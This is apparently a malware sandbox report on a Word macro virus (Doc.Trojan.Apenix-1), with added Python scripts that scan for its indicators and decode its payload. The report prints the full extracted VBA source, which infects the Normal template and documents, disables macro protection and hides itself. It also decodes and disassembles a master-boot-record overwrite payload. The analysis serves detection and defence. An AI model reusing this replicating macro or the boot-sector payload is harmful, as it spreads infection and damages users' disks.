Verdict: MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is flagged by ClamAV as Doc.Trojan.Apenix-1 and trips the legacy WordBasic macro-virus heuristic, but the extracted source is a VBA project with two modules, 'vir' and 'cnsts', that behaves as a classic Normal-template infector rather than a downloader. 'AutoClose' opens 'c:\aut0exec.bat' for binary write (creating an empty file if none exists) and, if that file is exactly 2 bytes long, removes its own modules and re-enables 'Options.VirusProtection', so a 2-byte marker file acts as an inoculation switch. Otherwise it calls 'timer', which fires 'Detonate' only on dates strictly between 25 and 30 December 2001 or between 22 and 26 February 2002, then checks whether NormalTemplate already holds a module named 'norm' and, if not, runs 'c': the string constant 'cnsts.n' is decoded by 'ex' (two characters per byte, each character's ASCII code minus 48 giving one nibble, so the alphabet is '0'..'?') into a temporary file named 'apendix', which is imported into the Normal template together with an exported copy of 'cnsts'; the template is then saved and the temporary file deleted. Decoding the constants shows that 'n' is a module 'norm' whose 'AutoOpen' turns 'Options.VirusProtection' off and copies 'vir' and 'cnsts' into every open document, and that 'v' is a copy of 'vir', so the infection runs in both directions. Macros named 'ViewVBCode', 'ToolsMacro' and 'FileTemplates' intercept the matching Word commands and call 'Stealth', which hides the Visual Basic editor and disables Ctrl+Break. 'Detonate' writes a 45-byte decoded blob to 'c:\command.c0m'; the bytes are 16-bit real-mode code that reads sector 1 of the first fixed disk via INT 13h (AH=02h, DL=80h), overwrites two bytes at fixed offsets and writes the sector back (AH=03h) before exiting with INT 20h, i.e. master boot record tampering. Nothing in the extracted source contacts the network or executes the written file, and 'Detonate' calls 'vir.im', a routine that does not exist in any extracted module, so that trigger is incomplete as extracted.
Heuristics (4)
- ClamAV: Doc.Trojan.Apenix-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Apenix-1.
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): the OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): the document contains VBA macro code.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): matched line in script: Sub AutoClose()
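Added example, not the analyzer's own heuristics: a small Python indicator scan that reproduces the kind of findings listed above on olevba-decoded VBA source. The two VBA samples embedded in it are constructed (a condensed imitation of the extracted macro and a benign AutoOpen macro), and the indicator names, patterns and the three-way verdict are my own choices rather than published signatures.

```python
import re

# Constructed samples (not the extracted artifact): a condensed imitation of
# the self-replication and stealth code in macros.bas, and a benign macro.
SAMPLE_INFECTED = r'''Sub AutoClose()
Open "c:\aut0exec.bat" For Binary Access Write As #1: Close #1
If FileLen("c:\aut0exec.bat") = 2 Then del ActiveDocument, "vir": Options.VirusProtection = True
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
Next i
End Sub
Sub c()
NormalTemplate.VBProject.VBComponents.import apndx
ActiveDocument.VBProject.VBComponents("cnsts").export apndx
NormalTemplate.Save
End Sub
Sub ToolsMacro(): Stealth
End Sub
Private Sub Stealth(): On Error Resume Next
Application.ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Public Const n = "4174747269627574652056425?4>616=65203=20226>6?726=22"
'''

SAMPLE_BENIGN = '''Sub AutoOpen()
ActiveDocument.Range.InsertAfter "Generated " & Format(Date, "yyyy-mm-dd")
End Sub
'''

# Indicator names and patterns are mine; each mirrors something visible in
# the extracted source rather than a published signature.
INDICATORS = {
    # copying modules between documents and Normal.dot = self-replication
    "vbproject_replication": re.compile(
        r"VBProject\.VBComponents.*?\.(import|export|remove)\b", re.I),
    "normal_template_write": re.compile(r"\bNormalTemplate\.Save\b", re.I),
    # toggling Word's macro warning on or off
    "virus_protection_toggle": re.compile(r"Options\.VirusProtection\s*=", re.I),
    # hiding the VB editor and disabling Ctrl+Break
    "editor_hidden": re.compile(
        r"ShowVisualBasicEditor\s*=\s*0|EnableCancelKey\s*=\s*0", re.I),
    # macros named after built-in Word commands intercept those commands
    "command_hijack": re.compile(
        r"^\s*(Private\s+)?Sub\s+(ToolsMacro|ViewVBCode|FileTemplates)\b", re.I | re.M),
    "auto_macro": re.compile(
        r"^\s*(Private\s+)?Sub\s+(Auto(Open|Close|Exec|New|Exit)|Document_(Open|Close))\b",
        re.I | re.M),
    # long string constants drawn only from '0'..'?' (the ex() nibble alphabet)
    "nibble_encoded_constant": re.compile(r'Const\s+\w+\s*=\s*"[0-9:;<=>?]{32,}', re.I),
}


def scan_vba(src: str) -> dict:
    """Return {indicator: match count} for every indicator that fires."""
    hits = {}
    for name, rx in INDICATORS.items():
        count = len(rx.findall(src))
        if count:
            hits[name] = count
    return hits


def classify(src: str) -> str:
    """Coarse verdict: replication plus at least two other indicators is
    macro-virus behaviour; any other hit needs an analyst; otherwise clean."""
    hits = scan_vba(src)
    if "vbproject_replication" in hits and len(hits) >= 3:
        return "macro-virus"
    if hits:
        return "review"
    return "clean"


if __name__ == "__main__":
    for label, src in (("infected", SAMPLE_INFECTED), ("benign", SAMPLE_BENIGN)):
        print(label, classify(src), scan_vba(src))
```

Run it against the text olevba dumps for a document (for example the macros.bas artifact below); as the second heuristic above notes, Word 6/95 WordBasic macros are not a VBA project, so a scan of olevba output alone cannot be relied on for those and the legacy-marker check still has to run on the raw OLE streams.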
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7424 bytes | d1fd88147ecc0049da148c3130e7b643c7945ac174bf8b252dc4ce92eecd6d79 | ClamAV: Doc.Trojan.Apenix-1 | unlikely |

The "unlikely" obfuscation verdict is the analyzer's generic string check; it does not recognise the custom two-characters-per-byte encoding of the 'cnsts' constants, which hide full copies of both macro modules and the Detonate payload.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "vir"
Const apndx = "apendix": Private a As Byte: Private flag As Boolean
Sub AutoClose()
Open "c:\aut0exec.bat" For Binary Access Write As #1: Close #1
If FileLen("c:\aut0exec.bat") = 2 Then
del ActiveDocument, "cnsts": del ActiveDocument, "vir": Options.VirusProtection = True
End
End If
timer
flag = True
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "norm" Then flag = False
Next i
If flag Then c
End Sub
Sub del(a As Object, n As String)
For i = 1 To a.VBProject.VBComponents.Count: If a.VBProject.VBComponents.Item(i).Name = n Then a.VBProject.VBComponents.Remove a.VBProject.VBComponents.Item(i)
Next i
End Sub
Sub ex(s As String, ap As String): Open ap For Binary Access Write As #1: For i = 1 To Len(s) - 1 Step 2: a1 = AscB(Mid(s, i, 1)) - 48: a2 = AscB(Mid(s, i + 1, 1)) - 48: a = a1 * 16 + a2: Put #1, , a: Next: Close #1
End Sub
Sub c()
ex cnsts.n, apndx
NormalTemplate.VBProject.VBComponents.import apndx
ActiveDocument.VBProject.VBComponents("cnsts").export apndx
NormalTemplate.VBProject.VBComponents.import apndx
NormalTemplate.Save
Kill apndx
End Sub
Sub timer(): If Date > #12/25/2001# And Date < #12/30/2001# Then Detonate
If Date > #2/22/2002# And Date < #2/26/2002# Then Detonate
End Sub
Sub Detonate(): vir.im ";80102;90100;:80001>07;;2<01<=13<684<20107<684=20107;80103;90100;:80001>07;;2<01<=13<=2000", "c:\command.c0m"
End Sub
Attribute VB_Name = "cnsts"
Public Const n = "4174747269627574652056425?4>616=65203=20226>6?726=220=0:436?6>737420766972203=2022766972220=0:5072697661746520613320417320427974650=0:537562204175746?4?70656>28290=0:4?70656>2022633:5<61757430657865632>6261742220466?722042696>617279204163636573732057726974652041732023313:20436<6?73652023310=0:49662046696<654<656>2822633:5<61757430657865632>6261742229203=2032205468656>0=0:64656<204>6?726=616<54656=706<6174652<2022636>737473223:2064656<204>6?726=616<54656=706<6174652<20226>6?726=223:204?7074696?6>732>566972757350726?74656374696?6>203=20547275650=0:456>640" + _
"=0:456>642049660=0:4?7074696?6>732>566972757350726?74656374696?6>203=2046616<73650=0:466?722045616368206465737420496>20446?63756=656>74730=0:666<6167203=20547275650=0:466?722069203=203120546?20646573742>564250726?6:6563742>5642436?6=706?6>656>74732>436?756>740=0:496620646573742>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=20766972205?0=0:5468656>20666<6167203=2046616<73650=0:4>65787420690=0:496620666<6167205468656>0=0:657820636>737" + _
"4732>762<207669720=0:646573742>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?7274207669720=0:4>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732822636>73747322292>6578706?7274207669720=0:646573742>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?7274207669720=0:4;696<6<207669720=0:456>642049660=0:4>65787420646573740=0:446?63756=656>74732>5361766520547275652<207764576?7264446?63756=656>740=0:456>64205375620=0:537562206578287320417320537472696>672<20617020417320537472696>67293:204?70656>20617020466?722042696>617279204163636573732057726974652041732023313:20466?722069203=203120546?204<656>287329202=2031205374657020323:206131203=2041736342284=696428732<20692<20312929202=2034383:206132203=2041736342284=696428732<2069202;20312<20312929202=2034383:206133203=206131202:203136202;2061323:205075742023312<202<2061333:204>6578743:20436<6?73652023310=0:456>64205375620=0:5375622064656<" + _
"2861204173204?626:6563742<206>20417320537472696>67290=0:20466?722069203=203120546?20612>564250726?6:6563742>5642436?6=706?6>656>74732>436?756>743:20496620612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=206>205468656>20612>564250726?6:6563742>5642436?6=706?6>656>74732>52656=6?766520612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869290=0:4>65787420690=0:456>64205375620=0:"
Public Const v = "4174747269627574652056425?4>616=65203=2022766972220=0:436?6>73742061706>6478203=20226170656>646978223:2050726976617465206120417320427974653:205072697661746520666<616720417320426?6?6<65616>0=0:537562204175746?436<6?736528290=0:4?70656>2022633:5<61757430657865632>6261742220466?722042696>617279204163636573732057726974652041732023313:20436<6?73652023310=0:49662046696<654<656>2822633:5<61757430657865632>6261742229203=2032205468656>0=0:64656<20416374697665446?63756=656>742<2022636>737473223:2064656<20416374697665446?63756=656>742<2022766972223:204?7074696?6>732>566972757350726?74656374696?6>203=20547275650=0:456>640=0:456>642049660=0:74696=65720=0:666<6167203=20547275650=0:466?722069203=203120546?204>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>436?756>740=0:4966204>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=20226>6?726=22205468656>20666<6167203=2046616<73650" + _
"=0:4>65787420690=0:496620666<6167205468656>20630=0:456>64205375620=0:5375622064656<2861204173204?626:6563742<206>20417320537472696>67290=0:20466?722069203=203120546?20612>564250726?6:6563742>5642436?" + _
"6=706?6>656>74732>436?756>743:20496620612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=206>205468656>20612>564250726?6:6563742>5642436?6=706?6>656>74732>52656=6?766520612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869290=0:4>65787420690=0:456>64205375620=0:537562206578287320417320537472696>672<20617020417320537472696>67293:204?70656>20617020466?722042696>617279204163636573732057726974652041732023313:20466?722069203=203120546?204<656>287329202=2031205374657020323:206131203=2041736342284=696428732<20692<20312929202=2034383:206132203=2041736342284=696428732<2069202;20312<20312929202=2034383:2061203=206131202:203136202;2061323:205075742023312<202<20613:204>6578743:20436<6?73652023310=0:456>64205375620=0:537562206328290=0:657820636>7374732>6>2<2061706>64780=0:4>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?7274" + _
"2061706>64780=0:416374697665446?63756=656>742>564250726?6:6563742>5642436?6=706?6>656>74732822636>73747322292>6578706?72742061706>64780=0:4>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?72742061706>64780=0:4>6?726=616<54656=706<6174652>536176650=0:4;696<6<2061706>64780=0:456>64205375620=0:5375622074696=657228293:2049662044617465203>202331322?32352?323030312320416>642044617465203<202331322?33302?3230303123205468656>204465746?6>6174650=0:49662044617465203>2023322?32322?323030322320416>642044617465203<2023322?32362?3230303223205468656>204465746?6>6174650=0:456>64205375620=0:537562204465746?6>61746528293:207669722>696=20223;38303130323;39303130303;3:38303030313>30373;3;323<30313<3=31333<3638343<32303130373<3638343=32303130373;38303130333;39303130303;3:38303030313>30373;3;323<30313<3=31333<3=32303030222<2022633:5<636?6=6=616>642>63306=220=0:456>64205375620=0:"
Sub ViewVBCode(): Stealth
End Sub
Sub ToolsMacro(): Stealth
End Sub
Sub FileTemplates(): Stealth
End Sub
Private Sub Stealth(): On Error Resume Next
Application.ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
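Added example, not part of the analyzer output or of the sample: a Python re-implementation of the 'ex' decoding loop shown above, applied to the opening characters of the 'n' and 'v' constants and to the full string that 'Detonate' passes. The input strings are copied from the preview; the function names and the INT 13h scan (a byte-pattern heuristic, not a disassembler) are mine.

```python
"""Decoder for the two-characters-per-byte scheme used by `Sub ex` in the
extracted macros: each character is (ASCII code - 48), i.e. one nibble, so
the alphabet is '0'..'9' followed by ':;<=>?' for 10..15."""

# Copied from the extracted macro source: opening characters of the
# `cnsts.n` and `cnsts.v` constants and the full `Detonate` string.
N_PREFIX = "4174747269627574652056425?4>616=65203=20226>6?726=220=0:"
V_PREFIX = "4174747269627574652056425?4>616=65203=2022766972220=0:"
DETONATE = (";80102;90100;:80001>07;;2<01<=13<684<20107<684=20107"
            ";80103;90100;:80001>07;;2<01<=13<=2000")

ALPHABET = "0123456789:;<=>?"


def decode_ex(s: str) -> bytes:
    """Mirror of `Sub ex`: value = (c1 - 48) * 16 + (c2 - 48) per pair.
    A trailing unpaired character is dropped, exactly as the VBA loop does."""
    out = bytearray()
    for i in range(0, len(s) - 1, 2):
        hi, lo = s[i], s[i + 1]
        if hi not in ALPHABET or lo not in ALPHABET:
            raise ValueError(f"character outside '0'..'?' at offset {i}")
        out.append((ord(hi) - 48) * 16 + (ord(lo) - 48))
    return bytes(out)


def module_name(decoded: bytes) -> str:
    """Pull the VB_Name attribute from the first line of a decoded module."""
    first = decoded.split(b"\r\n", 1)[0].decode("ascii", "replace")
    prefix = 'Attribute VB_Name = "'
    if not first.startswith(prefix):
        raise ValueError("not a VBA module header")
    return first[len(prefix):].rstrip('"')


def int13_calls(code: bytes) -> list:
    """Heuristic scan: for each INT 13h (CD 13) find the nearest preceding
    MOV AX,imm16 (B8 lo hi) and report its AH byte, the BIOS disk function
    (02h = read sectors, 03h = write sectors). Not a real disassembler, so a
    B8 inside another instruction's immediate could mislead it."""
    calls = []
    for off in range(len(code) - 1):
        if code[off:off + 2] == b"\xcd\x13":
            mov = code.rfind(b"\xb8", 0, off)
            ah = code[mov + 2] if mov >= 0 and mov + 2 < off else None
            calls.append((off, ah))
    return calls


def int13_summary(code: bytes) -> list:
    """Label each INT 13h call as read/write where the AH byte is known."""
    names = {0x02: "read", 0x03: "write"}
    return [(off, names.get(ah, "unknown")) for off, ah in int13_calls(code)]


if __name__ == "__main__":
    for label, blob in (("n", N_PREFIX), ("v", V_PREFIX)):
        print(f"constant {label} carries module {module_name(decode_ex(blob))!r}")
    code = decode_ex(DETONATE)
    print(f"Detonate writes {len(code)} bytes: {code.hex(' ')}")
    for off, kind in int13_summary(code):
        print(f"  INT 13h at offset {off}: {kind} sectors")
```

Decoded by hand, the 45 bytes are: mov ax,0201h; mov cx,0001h; mov dx,0080h; push ds; pop es; mov bx,012Ch; int 13h (read one sector, cylinder 0 head 0 sector 1 of drive 80h, into ds:012Ch); mov byte [si+01C2h],07h; mov byte [si+01D2h],07h; mov ax,0301h; mov cx,0001h; mov dx,0080h; push ds; pop es; mov bx,012Ch; int 13h (write the sector back); int 20h. Because the file is written with a '.c0m' extension and 'vir.im' is not defined in the extracted modules, the write to the master boot record is the payload's intent rather than something this sample is shown to execute.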